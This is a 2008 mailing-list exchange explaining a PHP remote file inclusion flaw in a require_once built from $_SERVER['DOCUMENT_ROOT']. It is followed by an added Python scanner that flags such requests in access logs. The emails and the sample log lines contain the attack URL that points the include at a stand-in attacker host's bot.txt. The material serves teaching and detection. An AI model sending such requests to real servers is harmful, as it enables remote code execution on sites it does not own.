On Tue, Aug 12, 2008 at 12:28:08PM -0400, sbeam wrote:
> On Tuesday 12 August 2008 12:18, Rainer Duffner wrote:
> > (I think it requires both register_globals and allow_url_fopen to be on,
> > but I'm not sure if you can't get it to work with only allow_url_fopen....)
>
> as I just found out, it can, as long as the PHP developer was even more naive
> than usual. The offending line was:
>
> require_once($_SERVER['DOCUMENT_ROOT']."/db.inc.php");
>
> then a request like:
>
> http://victim.com/index.php?_SERVER[DOCUMENT_ROOT]=http://badguysite.es/bot.txt
>
> will do a fopen() for "http://badguysite.es/bot.txt/db.inc.php", which is good
> enough.
>
> And yeah this works with register_globals off, which surprised me. And also
> surprised that mod_security has no problem with that URL. I am going to raise
> the issue with them.

Hi Sam,

Nice job tracking that down, and even nicer, explaining it with an example even.
If you don't mind I would like to use it as a real world example for a class
I'm teaching? I will remove all the identifying information first of course.

Thanks,
Jeff Kinz
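
A log check for the request shape described in the thread, as an added example that is not part of the original e-mails: it flags query parameters named after PHP superglobals (such as `_SERVER[DOCUMENT_ROOT]`), including percent-encoded forms, and records whether the value is a remote URL. The function names, client addresses and log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# PHP superglobal names; a client-supplied parameter should never use one.
SUPERGLOBALS = {"_SERVER", "_GET", "_POST", "_COOKIE", "_FILES",
                "_ENV", "_REQUEST", "_SESSION", "GLOBALS"}
REMOTE_URL = re.compile(r"^(?:https?|ftps?)://", re.IGNORECASE)
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(request_target):
    """Return (name, value, is_remote_url) for superglobal-named parameters."""
    hits = []
    query = request_target.partition("?")[2]
    # parse_qsl percent-decodes, so _SERVER%5BDOCUMENT_ROOT%5D is caught too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        base = name.split("[", 1)[0]  # "_SERVER[DOCUMENT_ROOT]" -> "_SERVER"
        if base in SUPERGLOBALS:
            hits.append((name, value, bool(REMOTE_URL.match(value))))
    return hits

def scan(log_lines):
    """Return (line_number, name, value, is_remote_url) for each hit."""
    findings = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_LINE.search(line)
        if match is None:
            continue
        for hit in suspicious_params(match.group(1)):
            findings.append((number, *hit))
    return findings

# Constructed access-log lines (combined-log style), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Aug/2008:12:01:44 -0400] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://badguysite.es/bot.txt HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Aug/2008:12:01:51 -0400] "GET /index.php?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fbadguysite.es%2Fbot.txt HTTP/1.0" 200 512',
    '192.0.2.10 - - [12/Aug/2008:12:02:03 -0400] "GET /index.php?page=2&ref=http://example.org/ HTTP/1.1" 200 1024',
    '192.0.2.44 - - [12/Aug/2008:12:02:19 -0400] "GET /index.php?GLOBALS[debug]=1 HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The third sample line carries a URL in an ordinary parameter and is not reported; the check keys on the parameter name, with the remote-URL flag as a severity hint.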